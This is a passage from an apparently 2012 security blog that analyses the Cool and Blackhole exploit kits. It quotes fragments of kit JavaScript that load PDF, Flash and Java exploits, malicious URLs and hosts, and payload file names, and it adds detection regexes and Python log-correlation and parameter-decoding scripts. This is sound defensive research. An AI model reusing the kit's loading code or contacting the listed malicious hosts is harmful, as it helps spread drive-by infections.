<span style="color: red;"> setTimeout("FlashExploit()", 8003);</span></blockquote>
<blockquote class="tr_bq">
<span style="color: red;">else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)){</span><br />
<span style="color: red;"> vver = "new";</span><br />
<span style="color: red;"> setTimeout("FlashExploit()", 7004);</span></blockquote>
<br />
<blockquote class="tr_bq">
<span style="color: red;">d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';</span></blockquote>
<br />
So now what does it do with this information?<br />
<br />
<b>It builds the URL "/media/pdf_" + vver + ".php", which is either /media/pdf_new.php or /media/pdf_old.php.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHp2OhkPWOoQn66KhspjXn6D20vLRMviUIKbpZieVW-NfT8tmdu6_vluTnaotMNleGm56d3CzRIrzsAMs-e6Ui9llc5r10N2FsuFP-mQGOzWruGT2Ga5Fa-coGiYt4JjDIZE8mXRA8c5k/s1600/pdfnew.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHp2OhkPWOoQn66KhspjXn6D20vLRMviUIKbpZieVW-NfT8tmdu6_vluTnaotMNleGm56d3CzRIrzsAMs-e6Ui9llc5r10N2FsuFP-mQGOzWruGT2Ga5Fa-coGiYt4JjDIZE8mXRA8c5k/s400/pdfnew.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #d1f0ff; font-family: 'Segoe UI', Arial, sans-serif; font-size: 12px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<h3>
Now, let's look at the Java:</h3>
<br />
<blockquote class="tr_bq">
<span style="color: red;"> if (javax[1]==7){</span><br />
<span style="color: red;"> variant = "new";</span><br />
<span style="color: red;"> val1="0b0909041f";</span><br />
<blockquote class="tr_bq">
<span style="color: red;"> val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139270235391c022c391c";</span></blockquote>
</blockquote>
<blockquote class="tr_bq">
<span style="color: red;"> else {<br /> variant = "file";<br /> val1="0b0909041f";<br /> val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139370235391c022c391c";</span></blockquote>
<span style="color: red;"><br /></span>
<br />
<blockquote class="tr_bq">
<span style="color: red;">WIDTH="200" HEIGHT="200"><PARAM NAME="CODE" VALUE="bagdfssdb"><PARAM NAME="CODEBASE" VALUE="../media/"><PARAM NAME="ARCHIVE" VALUE="' +<b> variant + '.jar</b>"><param name="type" value="application/x-java-applet;version=1.6"><param name="val" value="'<b>+val1+</b>'"/><param name="prime" value="<b>'+val2+'</b>"/></object>';.</span></blockquote>
Notice that the "codebase" value is "../media/". Great.<br />
So presumably we should be looking for GET requests containing "/media/", since each of these files resides under media, with the potential exception of some of the jar files, whose paths appear to be built from parameters inside the exploit kit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5E0Fkp7OU09RVz4hURwhSj_sxUZrks1tlS0e8o_ey8dUqYfscATt_ZD4PTOMY9qMN0n-d6HUcyk07k0J0OZHfj01bEHegBW0e54bPEy3R8odzJWEqQJjnNvCZQsNsG_PZfFFQk1SRiHA/s1600/file.jar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="17" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5E0Fkp7OU09RVz4hURwhSj_sxUZrks1tlS0e8o_ey8dUqYfscATt_ZD4PTOMY9qMN0n-d6HUcyk07k0J0OZHfj01bEHegBW0e54bPEy3R8odzJWEqQJjnNvCZQsNsG_PZfFFQk1SRiHA/s640/file.jar.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I also ran into hxxp://now.kitchenssinks.co.uk/t/media/new.jar<br />
<br />
I am still looking into the predictability of additional jar files.<br />
<b><br /></b>
<br />
<b>Binary:</b><br />
So far, the only binary GET request I have been able to observe is /f.php?k=. It should be noted that there are known variations with additional parameters, which are represented well by the<span style="font-family: inherit;"> <a href="http://www.emergingthreats.net/">Emergingthreats Regex</a> <span style="white-space: pre-wrap;">\/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$</span></span><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoVQSb4iMI4xp5L4dowU_Ab4k2_l8sUBIx5ZIIps6s3z4s27zc8mOZJJ_d7riEl-x7sXKlgu0MQe3mr-qhuRVoqu7CtIGjTqwT1AO9v6LnojinqCg_di1al7wtQFwUf10tZAMoI_E9MR0/s1600/cool+ek+binary.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoVQSb4iMI4xp5L4dowU_Ab4k2_l8sUBIx5ZIIps6s3z4s27zc8mOZJJ_d7riEl-x7sXKlgu0MQe3mr-qhuRVoqu7CtIGjTqwT1AO9v6LnojinqCg_di1al7wtQFwUf10tZAMoI_E9MR0/s400/cool+ek+binary.PNG" width="400" /></a></div>
<br />
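One way to use the static paths and the binary regex together is to correlate them per client, since a path such as /media/file.jar on its own can also occur on unrelated sites. This is an added example, not code from the article or from Emerging Threats: the binary regex is the one quoted above, the file names come from the static list, and the event layout, the `example.test` hosts and the verdict names are assumptions.

```python
import re
from urllib.parse import urlsplit

# File names from the article's static list. The article observed them below
# single-letter directories ("/r/media", "/t/media"); only the tail is matched
# here because the flash.swf sample in the article sits under "/data/".
EXPLOIT_PATH_RE = re.compile(
    r"/(?:(?:32|64)size_font\.eot|bagdfssdb\.jar"
    r"|media/(?:field\.swf|score\.swf|pdf_(?:new|old)\.php|new\.jar|file\.jar))$"
)
FLASH_INFO_RE = re.compile(r"/flash\.swf\?info=[a-f0-9]{32,}")
# Binary request regex quoted in the article (credited there to sid:2015873).
BINARY_RE = re.compile(r"\/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$")

# Constructed proxy events (client, URL) in time order. Hosts and clients are
# made up; only the path shapes come from the article.
SAMPLE_EVENTS = [
    ("10.1.2.3", "http://ek.example.test/t/32size_font.eot"),
    ("10.1.2.3", "http://ek.example.test/t/media/new.jar"),
    ("10.1.2.3", "http://ek.example.test/t/f.php?k=1&e=0&f=0"),
    ("10.1.2.4", "http://ek.example.test/r/media/pdf_old.php"),
    ("10.1.2.5", "http://cdn.example.test/media/player.swf"),
    ("10.1.2.5", "http://blog.example.test/a/f.php?k=12"),
    ("10.1.2.6", "http://ek.example.test/r/f.php?k=2"),
]


def stage(url):
    """Return 'exploit', 'payload' or None for a single request URL."""
    parts = urlsplit(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    if BINARY_RE.search(target):
        return "payload"
    if FLASH_INFO_RE.search(target) or EXPLOIT_PATH_RE.search(parts.path):
        return "exploit"
    return None


def correlate(events):
    """Group staged requests per (client, host) and grade the sequence."""
    seen = {}
    for client, url in events:
        tag = stage(url)
        if tag is not None:
            key = (client, urlsplit(url).hostname)
            seen.setdefault(key, []).append(tag)
    verdicts = {}
    for key, stages in seen.items():
        if "payload" in stages:
            before = stages[:stages.index("payload")]
            verdicts[key] = ("exploit-then-payload" if "exploit" in before
                             else "payload-only")
        else:
            verdicts[key] = "exploit-only"
    return verdicts


if __name__ == "__main__":
    for (client, host), verdict in correlate(SAMPLE_EVENTS).items():
        print(client, host, verdict)
```

The request ending in `k=12` gets no tag because the quoted regex allows a single digit and is anchored at the end of the URL.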
<h2>
Conclusion:</h2>
The Cool Exploit Kit can be detected in its current form. I hope to have more soon. As always, I welcome thoughts, comments and collaboration. @fknsec<br />
<h2>
References:</h2>
<br />
http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html<br />
http://threatpost.com/en_us/blogs/new-java-attack-introduced-cool-exploit-kit-111212<br />
http://www.malwaredomainlist.com/forums/index.php?action=recent<br />
http://www.avgthreatlabs.com/webthreats/info/cool-exploit-kit/<br />
http://jsunpack.jeek.org/?report=6aa9697f44b5f61ba3cb76b64935694c351f35ff<br />
http://doc.emergingthreats.net/bin/view/Main/2015887<br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-46962132761476229452012-11-01T11:21:00.000-07:002012-11-05T07:13:59.938-08:00Deeper into Blackhole, URLs and dialects.<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<br />
I am still focused on Blackhole URLs, specifically the binary get request. As I look deeper into the URL, tightening up the regex seems possible, as well as broadening the detection to catch those that use longer hex values. There are distinct dialects in the binary get request that are emerging.<br />
<br />
<br />
<span style="font-family: inherit; font-size: large;"><b>The improved Regex</b></span><br />
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><i>Binary Get Request:</i></b></span></div>
<div style="text-align: center;">
<b>\.php\?\w{2,8}\=(0[0-9a-b]|3[0-9]){5,32}\&\w{2,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{1,8}\=\d{2}\&\w{1,8}\=\w{1,8}\&\w{1,8}\=\w{1,8}</b><br />
<b><br /></b>
<b><i>Optimized by suggestions from Will Metcalf @node5. Thanks Will.</i></b><br />
<br />
<span style="font-size: large;"><b><i>PDF Get Request:</i></b></span><br />
<div style="text-align: center;">
\.php\?\w{2,9}\=(0[0-9a-b]|3[0-9]){5}\&\w{3,9}\=(3[0-9a-f]|4[0-9a-f])\&\w{3,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{3,9}\=(0[0-9a-b]{1,8})00020002<br />
<br />
<i>Thanks to @Dr4g0nFlySm0k3 for widening out my sample set and testing.</i></div>
</div>
<br />
<br />
<h3>
<span style="font-size: large;">Dialects in the Binary Get Request:</span></h3>
While the exact meaning of the dialects is unknown to me at this time, there are three distinct dialects I have seen in the binary get requests in the wild up to this point. By dialects, I'm referring to a particular pattern variation which is similar among groups of binary get requests.<br />
<br />
<b>Dialect 1: The 2by10</b><br />
In this dialect, the first parameter is 2 letters followed by 10 hex characters (2by10). The second parameter is 2 characters followed by 20 hex characters (2by20), then comes 1 character followed by two digits (1by2), then 2by1 and 2by1. This seems to be the most common dialect I have seen in the wild, and it was the basis for my first regex to detect the binary.<br />
<i>/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</i><br />
<br />
<b>Dialect 2: The 3by10</b><br />
In this dialect, the pattern is 3by10, then 3/4by20. The remainder varies; however, the third parameter is consistently a two-digit number. I do not have enough of these to extrapolate a predictable pattern yet.<br />
<i><br /></i>
<b>Dialect 3: The 4/5/6by64</b><br />
In this dialect, the first parameter is 4, 5 or 6 letters followed by 64 hex characters (4/5/6by64). The second parameter is 8 or 9 characters followed by 20 hex characters (8/9by20). There is fluctuation in the remaining parameters, but the third parameter is always a two-digit number.<br />
<span style="font-family: inherit;">/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb</span><br />
<br />
/detects/stones-instruction_think.php?hij=0802340202&fwi=0b0a33350a0735020405&nktu=03&wai=mpevbgmy&xsrpwq=rjbgqjpy<br />
<br />
These are only my observations of the values in the field. The dialects could represent a fingerprint that could be used to identify different actors, different versions of the exploit kit or different setups of the exploit kit.<br />
<br />
<h3>
What are the Hex values?</h3>
<div>
<br /></div>
The hex values are composed of two separate things intermixed: randomized garbage values and numeric digits. All hex values are either 00-0b or 30-39. The 00-0b values are likely garbage, while the 30-39 values represent numbers.<br />
<br />
Any of us who analyzed or detected the old version of Blackhole are familiar with the old f= & e= parameters. Well, I'm here to tell you it appears they still exist, only they have been morphed. The new version of Blackhole contains the same parameters, obfuscated by mixing garbage hexadecimal values into each number, with random characters inserted for good measure.<br />
<br />
<b>Let's break down one of the URLs.</b><br />
<i>/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</i><br />
<br />
<b>0735020b0b = 5</b><br />
07 = bell<br />
35 = 5<br />
02 = start of the text<br />
0b = vertical tab<br />
0b = vertical tab<br />
<br />
<b>3307093738070736060b = 3786</b><br />
33 = 3<br />
07 = bell<br />
09 = Horizontal tab<br />
37 = 7<br />
38 = 8<br />
07 = bell<br />
07 = bell<br />
36 = 6<br />
06 = Acknowledge<br />
0b = Vertical tab<br />
<br />
<b><br />Let's do another one.</b><br />
<i>/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v</i><br />
<br />
<b>050934030b = 4</b><br />
05 = Enquiry<br />
09 = Horizontal tab<br />
34 = 4<br />
03 = EndofText<br />
0b = Vertical tab<br />
<br />
<b>0a050304380b37370a36 = 8776</b><br />
<span style="font-family: inherit;">0a = Line feed</span><br />
<span style="font-family: inherit;">05 = Enquiry</span><br />
<span style="font-family: inherit;">03 = EndofText</span><br />
<span style="font-family: inherit;">04 = EndofTransmission</span><br />
<span style="font-family: inherit;">38 = 8</span><br />
<span style="font-family: inherit;">0b = Vertical tab</span><br />
<span style="font-family: inherit;">37 = 7</span><br />
<span style="font-family: inherit;">37 = 7</span><br />
<span style="font-family: inherit;">0a = Line feed</span><br />
<span style="font-family: inherit;">36 = 6</span><br />
<br />
<br />
Both of these URLs are of dialect 2by10. You will note that the first parameter turns out to be a single digit while the second value is four digits.<br />
<br />
<br />
<span style="font-family: inherit;"><b>Now let's go back to the fake AV infection URLs I looked at on September 15th</b></span><br />
<span style="font-family: inherit;">hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a3302340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a3508360208&rdm=02&bnvru=dolz&gwxjfli=ewsxs</span><br />
<br />
<br />
03080407333603030a3302340235073836093508033706363836353505080833 = 363458657686553<br />
<br />
<br />
0a09380b0a3508360208 = 856<br />
<br />
This follows a 4by64 dialect and the value of the first parameter is 363,458,657,686,553 and the second is 856.<br />
<br />
<b>Now Let's look at another one:</b><br />
<span style="font-family: inherit;">/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">This is a 6by64 dialect where the first parameter equals </span>38,865,545,353 and the second parameter equals 74.<br />
<br />
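Added example (not part of the original post): a Python sketch of the decoding walked through above, which also labels the dialect and checks each URL against the first and the improved binary get regex. The function names and the "NbyM" labelling helper are assumptions made for this example; the sample URLs are the ones quoted in the post.<br />

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Both regexes are copied from the posts: the first binary get regex
# (2by10 only) and the improved one printed above.
FIRST_REGEX = re.compile(
    r"\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}"
    r"\&\w\w\=\w\&\w\w\=\w$")
IMPROVED_REGEX = re.compile(
    r"\.php\?\w{2,8}\=(0[0-9a-b]|3[0-9]){5,32}\&\w{2,9}\=(0[0-9a-b]|3[0-9]){10}"
    r"\&\w{1,8}\=\d{2}\&\w{1,8}\=\w{1,8}\&\w{1,8}\=\w{1,8}")

# Per the post: pairs 00-0b are filler, pairs 30-39 are the ASCII digits 0-9.
ALLOWED_PAIR = re.compile(r"0[0-9a-b]|3[0-9]")


def decode_hex_value(value):
    """Drop the 00-0b filler pairs and return the digits carried by 30-39."""
    if len(value) % 2:
        raise ValueError("hex value has odd length")
    digits = []
    for i in range(0, len(value), 2):
        pair = value[i:i + 2].lower()
        if not ALLOWED_PAIR.fullmatch(pair):
            raise ValueError("pair %r is outside 00-0b and 30-39" % pair)
        if pair[0] == "3":
            digits.append(chr(int(pair, 16)))
    return "".join(digits)


def analyze(url):
    """Label the dialect, decode the first two parameters, run both regexes."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if len(params) != 5:
        raise ValueError("expected 5 query parameters, got %d" % len(params))
    (name1, value1), (name2, value2), (_, value3) = params[:3]
    return {
        # "NbyM" = N characters of parameter name by M hex characters of value
        "dialect": "%dby%d" % (len(name1), len(value1)),
        "second_shape": "%dby%d" % (len(name2), len(value2)),
        "first": decode_hex_value(value1),
        "second": decode_hex_value(value2),
        "third": value3,
        "first_regex": bool(FIRST_REGEX.search(url)),
        "improved_regex": bool(IMPROVED_REGEX.search(url)),
    }


# URLs quoted in the post: 2by10, 3by10, 4by64 and 6by64.
SAMPLES = [
    "/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b"
    "&f=02&nu=j&rw=m",
    "/detects/stones-instruction_think.php?hij=0802340202"
    "&fwi=0b0a33350a0735020405&nktu=03&wai=mpevbgmy&xsrpwq=rjbgqjpy",
    "hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a33"
    "02340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a35083"
    "60208&rdm=02&bnvru=dolz&gwxjfli=ewsxs",
    "/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b023606093506083"
    "50409050334350933080a3505063308&abnczdde=06090a3708050a063402"
    "&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(analyze(sample))
```

A value containing any pair outside 00-0b and 30-39 raises ValueError, which is a quick way to separate look-alike URLs from the encoded parameters described here.<br />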
Thanks to those who contributed their URLs to help broaden the analysis set and @Dr4g0nFlySm0k3 for discussions on the subject. #malwaremustdie.
<br />
<h2>
Blackhole 2.0 Binary Get Request</h2>
<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP. Published 2012-10-22, updated 2012-10-24.</span><br />
<br />
I am still focused on Blackhole 2.0, and <a href="http://fortknoxnetworks.blogspot.com/2012/10/blackhhole-exploit-kit-v-20-url-pattern.html" target="_blank">in my last article here</a> I examined the URL pattern. The regex in that previous article is good at detecting the entry points and the exploit as it is occurring, but not the binary get request. This was because of too many false positives for sites like Facebook (credit for the teamwork to <a class="twitter-atreply pretty-link" dir="ltr" href="https://twitter.com/Dr4g0nFlySm0k3" style="background-color: whitesmoke; color: #0084b4; font-family: Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none;"><s style="background-color: whitesmoke; color: #66b5d2; font-family: Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none;">@</s><b style="background-color: whitesmoke; color: #0084b4; font-family: Arial, sans-serif; font-size: 14px; font-weight: normal; line-height: 18px; text-decoration: underline;">Dr4g0nFlySm0k3</b></a>). Today, I focused on getting the pattern for the binary get request.<br />
<br />
This is an ongoing series where my intel will be posted as I get it. Feedback to me on twitter <a href="https://twitter.com/search?q=fknsec&src=typd" target="_blank">@fknsec</a>. Also, check out #malwaremustdie on twitter.<br />
<br />
<br />
<div style="text-align: center;">
Blackhole 2.0 Entry Point/PDF/PK Pattern<br />
Content type/MIME type:application/pdf<br />
<br /></div>
<div style="text-align: center;">
\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$</div>
<div style="text-align: center;">
Blackhole 2.0 Binary Get Request Pattern<br />
Content type/MIME Type: application/x-msdownload</div>
<br />
<div style="text-align: center;">
\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghrjXFwA0p57DnIdpgSoG61l8nOHzad9xCucr9KFNgchyed_Kbe0KQWTcI76JAwZaV4virTyyGg3F74eU83QreSp7kvi0dVsB4lOraV2pncfh6C3_yeVaVD34zh1RyirWHatxaKI9W8VQ/s1600/blackhole-regex-binary-get-request-fortknoxnetworks.blogspot.com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghrjXFwA0p57DnIdpgSoG61l8nOHzad9xCucr9KFNgchyed_Kbe0KQWTcI76JAwZaV4virTyyGg3F74eU83QreSp7kvi0dVsB4lOraV2pncfh6C3_yeVaVD34zh1RyirWHatxaKI9W8VQ/s320/blackhole-regex-binary-get-request-fortknoxnetworks.blogspot.com.png" width="320" /></a></div>
<br />
<br />
<h3>
<span style="font-size: large;">Blackhole 2.0 - All About the PDF</span></h3>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ARnKMkYTFipFflSYHMxBoHaag-cIJeUVSpFrF5MBUWhedmBwLyFHnar-bKsQxJJUgDToF2AI43eOvCKA_bmXMqqHaNGX4ILE8Z-lt69g8P9PA4XVojxD6xV67_ClYEIDsaOv20-_Vzg/s1600/backhole-adobe-not-installed.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ARnKMkYTFipFflSYHMxBoHaag-cIJeUVSpFrF5MBUWhedmBwLyFHnar-bKsQxJJUgDToF2AI43eOvCKA_bmXMqqHaNGX4ILE8Z-lt69g8P9PA4XVojxD6xV67_ClYEIDsaOv20-_Vzg/s200/backhole-adobe-not-installed.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 1:<br />Adobe Reader uninstalled, still prompts for PDF.</i></td></tr>
</tbody></table>
So far, I have only observed instances where a get request is made for the root php file, whose response contains an applet archive; the second request's response is a PDF download, followed by a PK jar file, followed by the binary get request. This is so predictable that when I removed Adobe Reader from my lab, the website still requested that I download the PDF and asked me where to save it (see Screen Cap 1).<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheR8S5cQvNxjMubEf-2iTNzc4H2N0IBBBzEilL8hMHNcGbHLAyNQus3i70Bk4az239DOGyFu-lxmVMEYgMO35ECd5Cs1CgWS-_-K7RGWTYkHK5Ig4bIi5bA5zzB4e6S8GbqAMikl21G9k/s1600/blackhole-bankofamerica.com+website.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheR8S5cQvNxjMubEf-2iTNzc4H2N0IBBBzEilL8hMHNcGbHLAyNQus3i70Bk4az239DOGyFu-lxmVMEYgMO35ECd5Cs1CgWS-_-K7RGWTYkHK5Ig4bIi5bA5zzB4e6S8GbqAMikl21G9k/s200/blackhole-bankofamerica.com+website.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 2<br />This sample really, really wanted me to log into Bank of America</i>.</td></tr>
</tbody></table>
As a side note - one of the malware samples was an impatient password stealer that actually launched IE and took me to the legitimate Bank of New York web page. (See Screen Cap 2).<br />
<br />
Once the PDF is downloaded and executed, the system requests one or a series of PK files which java executes.<br />
<br />
<h3>
<span style="font-size: large;">Trying to Stop the Exploit (and failing miserably)</span></h3>
I tried a series of moves to stop the exploit, all but one of which failed, and the other was inconclusive.<br />
<br />
<ul>
<li>Disabling Javascript in Adobe Reader - failed to stop the exploit.</li>
<li>Configured "Security Enhanced" to prevent any PDF from accessing the internet - failed to stop the exploit.</li>
<li>Removed Adobe Reader - Website prompted me to save the PDF (see second screen cap)</li>
<li>Installed Foxit Reader with "Security Enhancements" enabled - failed to stop the exploit.</li>
<li>Configured DEP for all windows programs - inconclusive. I saw a binary get request and the malware downloaded and showed up in the task manager, but then it disappeared. I need more data on this before I can speak further on this.</li>
</ul>
<div>
Interestingly enough, in a majority of the cases I reviewed, the actual malware launched was <b>install_0_msi.exe followed by a KB&lt;random number&gt;.exe</b>, presumably a Pony downloader followed by Zeus-family.</div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM-QySwfgjaGM7AAQEr1SCDyUu_ofIBnFxrv2BKL-4MlRYnaxz_3lrKKlcKa2aDho1L4ozSHYaMZMMlBSj3PU5wv43HHsVBXowOQfSt-dOxafXxTwD1pc2ybiFMJZAVFCRJYkfxIHbKQ/s1600/blackhole-dep-enabled.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM-QySwfgjaGM7AAQEr1SCDyUu_ofIBnFxrv2BKL-4MlRYnaxz_3lrKKlcKa2aDho1L4ozSHYaMZMMlBSj3PU5wv43HHsVBXowOQfSt-dOxafXxTwD1pc2ybiFMJZAVFCRJYkfxIHbKQ/s320/blackhole-dep-enabled.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 3:<br />Look at the task manager. Java and AcroRd32.exe.<br />The AcroRd32.exe is processor intensive when it opens.<br />Nothing shows on the screen to indicate that Adobe launched.</i></td></tr>
</tbody></table>
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkzjXyQEDxQhJRtbY_dYOxaEY_l1P52BEWjKJa-gHDI2O6xMSu1S7D2ewEP352EhrV2zVBhcPvTnyj400vQjxAAbmEVgDOjuW9JGBBpkt3delwsUSo0aMRi_gBEj4jAH3RL8zzZviiu6A/s1600/backhole-error.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkzjXyQEDxQhJRtbY_dYOxaEY_l1P52BEWjKJa-gHDI2O6xMSu1S7D2ewEP352EhrV2zVBhcPvTnyj400vQjxAAbmEVgDOjuW9JGBBpkt3delwsUSo0aMRi_gBEj4jAH3RL8zzZviiu6A/s320/backhole-error.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 4<br />Adobe and Foxit Readers security settings do not stop this attack. <br />In my lab, disabling Java does not affect it, neither does restricting PDF access to the internet.</i></td></tr>
</tbody></table>
<div>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Characteristics of the Blackhole 2.0 Binary Get Request:</span></h3>
<span style="font-family: Arial, Helvetica, sans-serif;">First off, check out this article posted by Rise on malwarereports.blogspot.com</span><br />
<div>
<a href="http://malwarereports.blogspot.com/2012/10/bhek-20-encode-param-value-update.html">http://malwarereports.blogspot.com/2012/10/bhek-20-encode-param-value-update.html</a></div>
<div>
Rise decodes the parameter values in the jar file to understand how blackhole passes the URL.</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">The Get Request:</span></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The regex for the URL string is \.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The get requests are all performed by the user agent "Java"; in these cases it was update 29.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The get requests contain no referrer (but the PDFs do).</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">The Response:</span></div>
</div>
<div>
<ul>
<li>Server: nginx -<i> Be wary this could easily be changed.</i></li>
<li>Content-Type: application/x-msdownload</li>
<li>Cache-Control: must-revalidate, post-check=0, pre-check=0 - (<i>I would not rely on this one)</i></li>
<li>Content-Disposition: attachment; filename=" </li>
<ul>
<li>The file names were one of three possibilities I observed:</li>
<ul>
<li>readme.exe</li>
<li>info.exe</li>
<li>about.exe</li>
</ul>
</ul>
<li>Content-Transfer-Encoding: binary </li>
</ul>
</div>
<div>
<br /></div>
<div>
<br /></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URLs (Binary get request only)</b></span><br />
<br />
<pre class="dualColTextStyle" hasbox="2">/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v
/links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b&tj=k
/links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h
/forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g
/detects/signOn_go.php?ef=050934030b&me=0b350707040802093705&k=02&hz=k&kb=d
/links/calls_already_stopping.php?qf=050934030b&ue=0b36340b353507360208&p=02&kp=c&lr=p</pre>
<pre class="dualColTextStyle" hasbox="2"><b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Examples:</span></b></pre>
<blockquote>
GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: sonatanamore.ru:8080<br />
